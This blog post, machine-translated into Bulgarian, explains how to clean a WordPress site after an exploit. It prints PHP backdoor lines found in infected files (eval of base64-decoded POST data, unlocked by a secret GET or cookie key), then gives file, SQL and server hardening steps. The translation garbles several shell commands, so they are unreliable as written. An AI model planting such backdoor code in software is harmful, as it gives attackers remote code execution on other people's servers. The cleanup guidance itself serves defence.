Преди да прочетете този пост, трябва да видите напишете тук, За да се разбере нещо. :)
Намерих го в няколко блогови файла на stealthsettings.com, кодове, подобни на тези по-долу, които се появиха в резултат на вируса с подвигът на WordPress.:
<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘file'])); изход; }?>
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); изход; }?>
Ако по-горе е за файла xmlrpc.php де ла Сънлив, На Впиши сървъра, изглежда като доста от този вид в изходни кодове.
Почистване на заразени файлове:
Ooookkkk ...
1. Най-доброто решение, тъй като това е направено резервно копиеИ да се почистват на базата данни е да се премахване файлове WordPress (можете да запазите wp-config.php и файлове, които не са строго свързани с wp платформата, след като бъдат внимателно проверени) от сървъра и да качите оригиналните от версията 2.5.1 (По този повод и да направи ъпгрейд версия WP :)) http://wordpress.org/download/ . Избършете включително тематични файлове, ако не вярваш, че си най-старателната проверка.
Изглежда, че са били засегнати и досиетата на теми, които не са били използвани преди в блога и просто смяна на темата, не решава проблема.
./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); изход; }?>
2. Търсене и изтриване на всички файлове, съдържащи:... * _new.php, _old.php *, * Jpgg, Giff *, * Pngg и WP-info.txt файл, ако има такива.
намирам. -име “* _new.php”
намирам. -име “* _old.php”
намирам. -име „* .jpgg“
намирам. -име “* _giff”
намирам. -име “* _pngg”
намирам. -име “wp-info.txt”
3. в / Tmp , Търсене и изтриване на папки като tmpYwbzT2
SQL чистене :
1. в Таблица Таблица wp_options Проверете и изтриване на редове: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. Всичко в wp_options, отидете на active_plugins и изтрийте, ако има плъгин, който завършва в една от разширения * _new.php, _old.php *, *. jpgg, *. giff, *. pngg или друг вътрешен съмнение, проверете внимателно.
3. В таблица wp_users, Да видим дали има потребител, който не е написал нищо в правото си, колоната user_nicename. Изтрийте този потребител, но запомнете номера в колоната ID. Този потребител вероятно ще използва "WordPress“Прибл user_login е създаден и се появява на 00: 00: 00 0000-00-00.
4. Отиди до масата wp_usermeta и да изтриете всички линии, принадлежащи ID-горе.
След като направите това почистване на sql, деактивирайте и след това активирайте всяка приставка. (в блога -> Табло за управление -> Приставки)
Secure сървъра:
1. Вижте какво директории и файлове са "писане"(chmod 777) и се опитайте да поставите a chmod което вече няма да позволява писането им на никакво ниво. (chmod 644, например)
Намери. -Перм-2-LS
2. Вижте какви файлове има бит SUID или SGID . Ако не използвате тези файлове, сложи върху тях chmod 0 или деинсталиране на пакет, който тя съдържа. Те са много опасни, защото те изпълняват привилегии "група"Или"корен"Не и с нормални привилегии потребител да изпълни този файл.
Намери / тип F-къдрене-04000-LS
Намери / тип F-къдрене-02000-LS
3. Проверете кои портове са отворени и се опитайте да затворите или защитите тези, които не се използват.
NETSTAT-на | Впиши-и слушате
Толкова много. Виждам Някои блогове са забранени Google Search и други казват: "Ами те направиха!". Ами добре сте го направили ... но знаеш, че ако Google започва да се забрани всички сайтове формиране Е спам и сложи троянски коне (Trojan.Clicker.HTML) в бисквитки?
1 мисъл на „WordPress Експлойт - Почистване на вирусни файлове, SQL и сигурността на сървъра. ”